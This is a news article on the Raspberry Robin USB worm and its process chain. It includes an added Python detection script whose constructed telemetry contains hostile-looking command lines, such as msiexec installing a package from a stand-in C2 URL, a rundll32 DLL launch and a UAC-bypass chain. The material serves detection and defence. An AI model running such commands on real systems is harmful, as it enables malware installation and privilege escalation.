Cybersecurity researchers have discovered a new malware program with worm-like capabilities that is distributed via removable USB devices.
Attributing the malware to a cluster it tracks as “Raspberry Robin”, Red Canary researchers noted that the worm “uses the Windows Installer to access QNAP-related domains and load malicious DLLs.”
The earliest signs of activity are said to date back to September 2021, when infections were observed in organizations in the technology and manufacturing sectors.
Attack chains involving Raspberry Robin begin when an infected USB flash drive is connected to a Windows machine. The drive carries the worm payload, which appears as a .LNK shortcut file posing as a legitimate folder.
The worm then spawns a new process via cmd.exe to read and execute the malicious file stored on the external drive.
This is followed by the launch of explorer.exe and msiexec.exe, the latter of which is used for outbound network communication with a malicious domain for command-and-control (C2) purposes, as well as to download and install a DLL file.
The malicious DLL is subsequently loaded and executed through a chain of legitimate Windows utilities such as fodhelper.exe, rundll32.exe launching rundll32.exe, and odbcconf.exe, effectively bypassing User Account Control (UAC).
Also common to Raspberry Robin detections is outbound C2 contact from the regsvr32.exe, rundll32.exe, and dllhost.exe processes to IP addresses associated with Tor nodes.
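The chain described above (cmd.exe reading a file from the inserted drive, msiexec.exe pulling from an external host, fodhelper.exe and rundll32.exe-to-rundll32.exe for UAC bypass, and regsvr32/rundll32/dllhost talking to Tor nodes) maps directly onto process-creation and network-connection telemetry. The following is an added detection example written for this page; it is not Red Canary's code or any vendor's rule set. The event records resemble Sysmon Event ID 1 and Event ID 3 fields, and every path, command line, IP address and the "known Tor node" list is constructed for the example. Two heuristics are assumptions rather than claims about the malware: a non-system drive letter stands in for a real removable-media check, and "external" means outside RFC 1918, loopback and link-local ranges.

```python
"""Detection rules for a Raspberry Robin-style process chain (added example).

Constructed Sysmon-like telemetry; no artefact below is a real indicator.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

# Constructed process-creation records (Sysmon Event ID 1-style fields).
PROCESS_EVENTS: List[Event] = [
    {"pid": 880, "ppid": 600, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    # cmd.exe launched to run a file on the inserted drive (E: is constructed)
    {"pid": 4120, "ppid": 880, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": r"cmd.exe /c E:\setup.cmd"},
    # msiexec.exe installing straight from an external host (constructed domain)
    {"pid": 4140, "ppid": 4120, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /q /i http://example-c2.invalid/pkg.msi"},
    # fodhelper.exe auto-elevates and spawns rundll32.exe, which spawns rundll32.exe
    {"pid": 4160, "ppid": 4140, "image": r"C:\Windows\System32\fodhelper.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe", "cmdline": "fodhelper.exe"},
    {"pid": 4180, "ppid": 4160, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\x.dll,Start"},
    {"pid": 4200, "ppid": 4180, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\x.dll,Run"},
    # Benign noise: a local installer and an ordinary cmd.exe on the system drive
    {"pid": 5000, "ppid": 880, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi"},
    {"pid": 5020, "ppid": 880, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": r"cmd.exe /c dir C:\Users\alice"},
]

# Constructed network-connection records (Sysmon Event ID 3-style fields).
NETWORK_EVENTS: List[Event] = [
    {"pid": 4200, "image": r"C:\Windows\System32\rundll32.exe", "dest_ip": "203.0.113.10", "dest_port": 9001},
    {"pid": 4220, "image": r"C:\Windows\System32\regsvr32.exe", "dest_ip": "198.51.100.7", "dest_port": 443},
    {"pid": 4240, "image": r"C:\Windows\System32\dllhost.exe", "dest_ip": "192.168.1.20", "dest_port": 445},
    {"pid": 5100, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dest_ip": "203.0.113.10", "dest_port": 443},
]

# Constructed stand-in for a Tor relay list; in production, load the live consensus.
KNOWN_TOR_NODES = {"203.0.113.10"}

SYSTEM_DRIVE = "C:"  # assumption: any other drive letter is treated as removable media
DRIVE_REF = re.compile(r"(?<![A-Za-z0-9])([A-Za-z]):\\")
URL_REF = re.compile(r"https?://", re.IGNORECASE)
NETWORKING_LOLBINS = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def basename(path: object) -> str:
    return str(path).rsplit("\\", 1)[-1].lower()


def cmd_reads_from_other_drive(ev: Event) -> bool:
    """Rule 1: cmd.exe whose command line references a file on a non-system drive."""
    if basename(ev["image"]) != "cmd.exe":
        return False
    drives = {m.group(1).upper() + ":" for m in DRIVE_REF.finditer(str(ev["cmdline"]))}
    return any(d != SYSTEM_DRIVE for d in drives)


def msiexec_fetches_url(ev: Event) -> bool:
    """Rule 2: msiexec.exe given an http(s) URL instead of a local package."""
    return basename(ev["image"]) == "msiexec.exe" and bool(URL_REF.search(str(ev["cmdline"])))


def uac_bypass_child(ev: Event) -> bool:
    """Rule 3: any child of fodhelper.exe (it normally spawns nothing), or rundll32 -> rundll32."""
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    return parent == "fodhelper.exe" or (parent == "rundll32.exe" and child == "rundll32.exe")


def lolbin_outbound(ev: Event) -> bool:
    """Rule 4: regsvr32/rundll32/dllhost connecting outside internal address ranges."""
    if basename(ev["image"]) not in NETWORKING_LOLBINS:
        return False
    addr = ipaddress.ip_address(str(ev["dest_ip"]))
    return not any(addr in net for net in INTERNAL_NETS)


def run_detections(process_events: List[Event], network_events: List[Event]) -> List[Tuple[str, object]]:
    """Apply all rules and return (rule_name, pid) findings in event order."""
    findings: List[Tuple[str, object]] = []
    for ev in process_events:
        if cmd_reads_from_other_drive(ev):
            findings.append(("cmd_from_other_drive", ev["pid"]))
        if msiexec_fetches_url(ev):
            findings.append(("msiexec_url", ev["pid"]))
        if uac_bypass_child(ev):
            findings.append(("uac_bypass_chain", ev["pid"]))
    for ev in network_events:
        if lolbin_outbound(ev):
            rule = "lolbin_to_tor_node" if ev["dest_ip"] in KNOWN_TOR_NODES else "lolbin_outbound"
            findings.append((rule, ev["pid"]))
    return findings


def ancestry(pid: object, process_events: List[Event]) -> List[str]:
    """Walk ppid links to reconstruct the spawn chain ending at pid (oldest first)."""
    by_pid = {ev["pid"]: ev for ev in process_events}
    chain: List[str] = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for rule, pid in run_detections(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"{rule:22s} pid={pid} chain={' > '.join(ancestry(pid, PROCESS_EVENTS))}")
```

Each rule fires on its own, but the value is in correlation: `ancestry()` ties the rundll32.exe that reached the Tor node back through fodhelper.exe, msiexec.exe and cmd.exe to explorer.exe, which is the whole chain the article describes in one alert. The benign msiexec.exe and cmd.exe records show why the rules key on the URL and the drive letter rather than on the binary names alone.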
However, at this stage the operators' objectives remain unknown. It is also unclear how and where the external drives are infected, although it is suspected that this happens offline.
“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. “One of the hypotheses is that this may be an attempt to establish persistence on an infected system.”